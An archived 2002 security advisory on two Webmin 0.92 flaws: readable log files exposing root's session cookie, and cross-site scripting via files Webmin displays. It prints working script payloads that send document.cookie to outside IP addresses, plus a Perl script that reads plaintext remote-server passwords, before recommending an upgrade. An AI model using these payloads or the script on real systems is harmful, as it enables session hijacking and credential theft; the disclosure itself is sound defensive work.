Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Adminware, Control Panels :: web5197.htm

Local webmin root access



21th Mar 2002 [SBWID-5197]
COMMAND

	Local webmin root access

SYSTEMS AFFECTED

	 version 0.92 affected. 

	 Corrected in 0.93.

PROBLEM

	advisory@prophecy.net.nz  found  two  bugs  regarding  webmin,   a   web
	management tool :
	

	 Problem #1:

	 -----------

	

	Version 0.92-1  of  Webmin  (when  installed  by  rpm)  leaves  insecure
	permissions on the /var/webmin directory. This  means  that  if  command
	logging  within  webmin  is  enabled,  any  local  user  can  read   the
	/var/webmin/webmin.log file and retrieve  the  root  users  sid  (cookie
	session id). It is trivial to then create a  faked  local  cookie  using
	this session-id, and log directly into webmin as root.
	

	

	 Problem #2:

	 -----------

	

	If a semi-trusted colleague is given a restricted  level  of  access  to
	some Webmin functions, specifically sendmail, then  malicious  code  can
	be inserted into certain files that  would  result  in  revealing  roots
	webmin sid (cookie session id) when the root  user  visits  the  related
	page in webmin.
	

	

	 Example Exploit:

	 ----------------

	

	Insert the following line into the virtusers  file,  and  wait  for  the
	root user to visit that page:
	

	</tt></a></td><tt><td><script>/* */document.write(\'<img

	src=\"http://192.168.40.1/\'+document.cookie+\'\">\');</script>

	

	

	Or the following into the /etc/aliases file:
	

	</a></td><td><tt><script>zz=unescape(\"%20\");document.write(\'<img\'/*:

	*/+zz+\'src=\"http://10.1.1.33/\'+document.cookie+\'\">\');</script>

	

	

	Potentially more likely to be exploited however, would  be  a  malicious
	local user who has _no_ access to webmin, who could change a  file  that
	webmin views through the HTML interface (where the code  being  read  in
	is not checked for HTML). An example  would  be  changing  their  \'real
	name\' in /etc/passwd to be something along the lines of:
	

	<script>zz=unescape(\"%3A\");document.write(\'<img

	src=\"http\'+zz+\'//10.1.1.33/\'+document.cookie+\'\">\');</script>

	

	(Although chfn doesn\'t let you specify a username this  long,  but  you
	get the idea.)
	

	This same problem exists in pretty much  most  parts  of  webmin,  where
	files (or command output like \'ps\') is read in and  displayed  in  the
	web interface.
	

	 Update (25 March 2002)

	 ======

	

	Ed [ekg@tricity.wsu.edu] adds :
	

	as a small addendum to this  advisory,  we  noticed  some  similar  file
	permission  problems  in  /etc/webmin/servers/,  in  our  local   webmin
	installation. we were using  webmin-0.92-1,  noarch  RPM  version.  this
	problem was reported to Jamie last month and is fixed in webmin 0.93.
	

	this problem could allow a local user to read the webmin user  passwords
	for remote hosts running webmin,  configured  under  the  \'webmin\'  >>
	\'webmin servers\' >> \'edit server\' page. this is a  problem  only  if
	we  enter  the  login  information  for  a  server,  so  as  to   enable
	auto-login, and thus, could lead to \'root\'  or  \'admin\'  access  (on
	the remote webmin server) if we are using the cluster users, groups,  or
	packages feature of webmin.
	

	the username and password are stored, in plaintext,  with  the  rest  of
	the host information in /etc/webmin/servers/${time}.serv, where  ${time}
	is the time that the remote server was first  discovered  by  the  local
	webmin,  measured  as   a   number   of   seconds   since   the   epoch.
	/etc/webmin/servers has the search bit enabled, but not  the  read  bit.
	therefore  we  can  read  the  server  information  files  by  searching
	backwards from the current time, e.g.:
	

	#!/usr/bin/perl

	#read server info files by stepping backwards from current time

	print STDERR \"looking for server info from /etc/webmin/servers, press ^c to end\\n\";

	for ($tstamp= time(); $tstamp > 0; $tstamp--) {

	  open (SERVINFO, \"</etc/webmin/servers/$tstamp.serv\") or next;

	  print \"contents of /etc/webmin/servers/$tstamp.serv:\\n\";

	  print <SERVINFO>;

	  close SERVINFO or die \"error detected on file close\";

	}

	

SOLUTION

	Upgrade to the latest  version  of  Webmin  (0.93),  which  fixes  these
	issues (as well as a couple of others apparently).
	

	Available from:
	

	http://www.webmin.com/download.html

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH